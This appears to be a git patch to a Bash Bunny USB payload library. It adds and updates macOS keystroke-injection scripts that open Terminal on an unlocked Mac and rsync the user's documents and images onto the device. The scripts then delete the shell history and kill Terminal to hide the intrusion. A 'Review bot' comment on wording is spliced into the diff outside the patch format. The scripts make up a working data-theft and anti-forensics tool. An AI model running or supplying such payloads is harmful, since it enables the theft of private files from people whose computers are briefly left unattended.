From 37a4d9b42e2e34b2dc2da5d5253158795dd9e6b6 Mon Sep 17 00:00:00 2001
From: afsh4ck <132138425+afsh4ck@users.noreply.github.com>
Date: Sat, 10 Jun 2023 03:03:32 +0200
Subject: [PATCH] Update of MacPhotoExfill & Create MacDocsExfill (#588)
* Update readme.md * Update payload.txt * Create MacDocsExfill * Delete MacDocsExfill * Add files via upload
---
 .../exfiltration/MacDocsExfill/payload.txt | 78 +++++++++++++++++++
 .../exfiltration/MacDocsExfill/readme.md | 46 +++++++++++
 .../exfiltration/MacPhotoExfill/payload.txt | 45 +++++++----
 .../exfiltration/MacPhotoExfill/readme.md | 23 +++---
 4 files changed, 165 insertions(+), 27 deletions(-)
 create mode 100644 payloads/library/exfiltration/MacDocsExfill/payload.txt
 create mode 100644 payloads/library/exfiltration/MacDocsExfill/readme.md
diff --git a/payloads/library/exfiltration/MacDocsExfill/payload.txt b/payloads/library/exfiltration/MacDocsExfill/payload.txt
new file mode 100644
index 000000000..8550d009c
--- /dev/null
+++ b/payloads/library/exfiltration/MacDocsExfill/payload.txt
@@ -0,0 +1,78 @@
+#!/bin/bash
+#
+# Title: MacDocsExfill
+# Author: afsh4ck
+# Version: 1.0
+# Target: MacOS
+# Category: Exfiltration
+#
+# Exfilter all the images from the principal folders on unlocked MacOS targets.
+# Stashes them in /loot/MacDocsExfill
+#
+# Purple Setup
+# Amber..............Attack Mode ON
+# Green..............Finished
+
+LED SETUP
+ATTACKMODE HID STORAGE ECM_ETHERNET
+GET TARGET_HOSTNAME
+QUACK DELAY 1000
+
+lootdir=loot/MacDocsExfill/$TARGET_HOSTNAME
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 2000
+
+LED STAGE 1
+
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Desktop;
+QUACK ENTER
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
+QUACK ENTER
+QUACK STRING rsync -av Documents/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Documents ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Desktop/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Desktop ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Downloads/**/*.{docx,xlsx,pdf} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+
+# Ensure sincronization
+sync
+
+# Cleanup and delete proofs
+LED STAGE 2
+QUACK ENTER
+
+# Eject BB storage
+QUACK STRING diskutil eject /Volumes/BashBunny/
+QUACK ENTER
+QUACK DELAY 500
+
+# Remove terminal history from current session (commands used in attack won't be visible with the history command)
+QUACK STRING rm -r ~/.zsh_sessions
+QUACK ENTER
+QUACK DELAY 500
+
+# Exit terminal
+QUACK STRING killall Terminal
+QUACK ENTER
+
+LED FINISH
\ No newline at end of file
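Review bot: The header comment `# Exfilter all the images from the principal folders on unlocked MacOS targets.` does not describe this payload, whose three rsync lines match only `*.{docx,xlsx,pdf}`; change it to `# Exfiltrates all the documents (.docx, .xlsx, .pdf) from the principal folders on unlocked MacOS targets.` and `# Stashes them in /loot/MacDocsExfill/$TARGET_HOSTNAME` so it agrees with the `lootdir=` line below (the new readme's `# IMAGE FORMATS` heading carries the same copy-paste). The LED legend in the same header (Purple, Amber, Green) matches neither the calls the script actually makes — `LED SETUP`, `LED STAGE 1`, `LED STAGE 2`, `LED FINISH` — nor the four-row LED table in the readme, so list those four calls with their meaning instead. `# Ensure sincronization` above the bare `sync` is misspelled and, more importantly, does not say that `sync` is the one line in this stretch that runs on the Bunny itself rather than being typed into the target; `# Bunny-side: flush pending writes before the target is told to eject the volume` would make that explicit. The same comment and `sync` line recur in the MacPhotoExfill hunk at `@@ -37,33 +37,50 @@`, which should get the same wording.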
diff --git a/payloads/library/exfiltration/MacDocsExfill/readme.md b/payloads/library/exfiltration/MacDocsExfill/readme.md
new file mode 100644
index 000000000..c29bd451c
--- /dev/null
+++ b/payloads/library/exfiltration/MacDocsExfill/readme.md
@@ -0,0 +1,46 @@
+# Mac Docs Exfilter for the BashBunny
+
+ _______ ______ ______ __ __
+| \ / \ / \ | \ | \
+| $$$$$$$\| $$$$$$\| $$$$$$\ | $$ | $$
+| $$ | $$| $$ | $$| $$ \$$______ \$$\/ $$
+| $$ | $$| $$ | $$| $$ | \ >$$ $$
+| $$ | $$| $$ | $$| $$ __ \$$$$$$/ $$$$\
+| $$__/ $$| $$__/ $$| $$__/ \ | $$ \$$\
+| $$ $$ \$$ $$ \$$ $$ | $$ | $$
+ \$$$$$$$ \$$$$$$ \$$$$$$ \$$ \$$
+
+
+* Author: afsh4ck
+* Version: 1.0
+* Target: MacOS
+* Tested on: Ventura 13.3.1
+* Category: Exfiltration
+
+# DESCRIPTION
+
+Exfilter all the documents from the principal folders on unlocked MacOS targets.
+Stashes them in /loot/MacDocsExfill/$hostname grouped in subfolders:
+
+| Subfolder | Content |
+| ------------------ | -------------------------------------------- |
+| Documents | All the docs in /root/Documents folder |
+| Desktop | All the docs in /root/Desktop folder |
+| Downloads | All the docs in /root/Downloads folder |
+
+# IMAGE FORMATS
+
+| Format |
+| ------------------ |
+| .docx |
+| .xlsx |
+| .pdf |
+
+# LED STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Green | Setup |
+| Yellow Blink | Attack Mode ON |
+| Purple Slow | Cleaning all proofs |
+| Green Fixed | Finish |
diff --git a/payloads/library/exfiltration/MacPhotoExfill/payload.txt b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
index e2ed4f90b..e1802e69f 100644
--- a/payloads/library/exfiltration/MacPhotoExfill/payload.txt
+++ b/payloads/library/exfiltration/MacPhotoExfill/payload.txt
@@ -2,7 +2,7 @@
 #
 # Title: MacPhotoExfill
 # Author: afsh4ck
-# Version: 1.0
+# Version: 1.1
 # Target: MacOS
 # Category: Exfiltration
 #
@@ -27,7 +27,7 @@ QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 2000
-LED ATTACK
+LED STAGE 1
 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Documents;
 QUACK ENTER
@@ -37,33 +37,50 @@ QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Pictures;
 QUACK ENTER
 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/Downloads;
 QUACK ENTER
-QUACK STRING cp Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
+QUACK STRING rsync -av Documents/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Documents ;
 QUACK ENTER
-QUACK STRING cp Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
+QUACK STRING echo "Please wait while the files are copied...";
 QUACK ENTER
-QUACK STRING cp Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
+QUACK STRING wait;
 QUACK ENTER
-QUACK STRING cp Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK STRING rsync -av Desktop/*.{png,jpg,jpeg} /Volumes/BashBunny/$lootdir/Desktop ;
 QUACK ENTER
-# We can control the time for the payload execution
-QUACK DELAY 25000
-QUACK CTRL C
-# Cleanup and delete proofs
-LED M SLOW
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+QUACK STRING rsync -av Pictures/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Pictures ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
 QUACK ENTER
+QUACK STRING rsync -av Downloads/*.{jpg,jpeg,png} /Volumes/BashBunny/$lootdir/Downloads ;
+QUACK ENTER
+QUACK STRING echo "Please wait while the files are copied...";
+QUACK ENTER
+QUACK STRING wait;
+QUACK ENTER
+
+# Ensure sincronization
+sync
+
+# Cleanup and delete proofs
+LED STAGE 2
 QUACK ENTER
+
 # Eject BB storage
 QUACK STRING diskutil eject /Volumes/BashBunny/
 QUACK ENTER
 QUACK DELAY 500
+
 # Remove terminal history from current session (commands used in attack won't be visible with the history command)
 QUACK STRING rm -r ~/.zsh_sessions
 QUACK ENTER
 QUACK DELAY 500
+
 # Exit terminal
 QUACK STRING killall Terminal
 QUACK ENTER
-# Ensure sincronization
-sync
-LED FINISH
\ No newline at end of file
+LED FINISH
diff --git a/payloads/library/exfiltration/MacPhotoExfill/readme.md b/payloads/library/exfiltration/MacPhotoExfill/readme.md
index 9e9e1bb76..eee524c8b 100644
--- a/payloads/library/exfiltration/MacPhotoExfill/readme.md
+++ b/payloads/library/exfiltration/MacPhotoExfill/readme.md
@@ -1,17 +1,14 @@
 # Mac Photo Exfilter for the BashBunny
-
-* ___ ___ ___ ___ ___ ___ ___
-* / /\ / /\ / /\ /__/\ / /\ / /\ /__/|
-* / /::\ / /:/_ / /:/_ \ \:\ / /::\ / /:/ | |:|
-* / /:/\:\ / /:/ /\ / /:/ /\ \__\:\ / /:/\:\ / /:/ | |:|
-* / /:/ /::\ / /:/ /:// /:/ /::\ ___ / /::\ / /:/ /::\ / /:/ ___ __| |:|
-* /__/:/ /:/\:\/__/:/ /://__/:/ /:/\:\/__/\ /:/\:\/__/:/ /:/\:\/__/:/ / /\/__/\_|:|____
-* \ \:\/:/__\/\ \:\/:/ \ \:\/:/ /:/\ \:\/:/__\/\ \:\/:/__\/\ \:\ / /:/\ \:\/:::::/
-* \ \::/ \ \::/ \ \::/ /:/ \ \::/ \ \::/ \ \:\ /:/ \ \::/---
-* \ \:\ \ \:\ \__\/ /:/ \ \:\ \ \:\ \ \:\/:/ \ \:\
-* \ \:\ \ \:\ /__/:/ \ \:\ \ \:\ \ \::/ \ \:\
-* \__\/ \__\/ \__\/ \__\/ \__\/ \__\/ \__\/
+ _______ __ __ ______ ________ ______ __ __
+| \ | \ | \ / \| \ / \ | \ | \
+| $$$$$$$\| $$ | $$| $$$$$$\\$$$$$$$$| $$$$$$\ | $$ | $$
+| $$__/ $$| $$__| $$| $$ | $$ | $$ | $$ | $$ ______ \$$\/ $$
+| $$ $$| $$ $$| $$ | $$ | $$ | $$ | $$| \ >$$ $$
+| $$$$$$$ | $$$$$$$$| $$ | $$ | $$ | $$ | $$ \$$$$$$/ $$$$\
+| $$ | $$ | $$| $$__/ $$ | $$ | $$__/ $$ | $$ \$$\
+| $$ | $$ | $$ \$$ $$ | $$ \$$ $$ | $$ | $$
+ \$$ \$$ \$$ \$$$$$$ \$$ \$$$$$$ \$$ \$$
 * Author: afsh4ck
@@ -47,4 +44,4 @@ Stashes them in /loot/MacPhotoExfill/$hostname grouped in subfolders:
 | Green | Setup |
 | Yellow Blink | Attack Mode ON |
 | Purple Slow | Cleaning all proofs |
-| Green Fixed | Finish |
+| Green Fixed | Finish |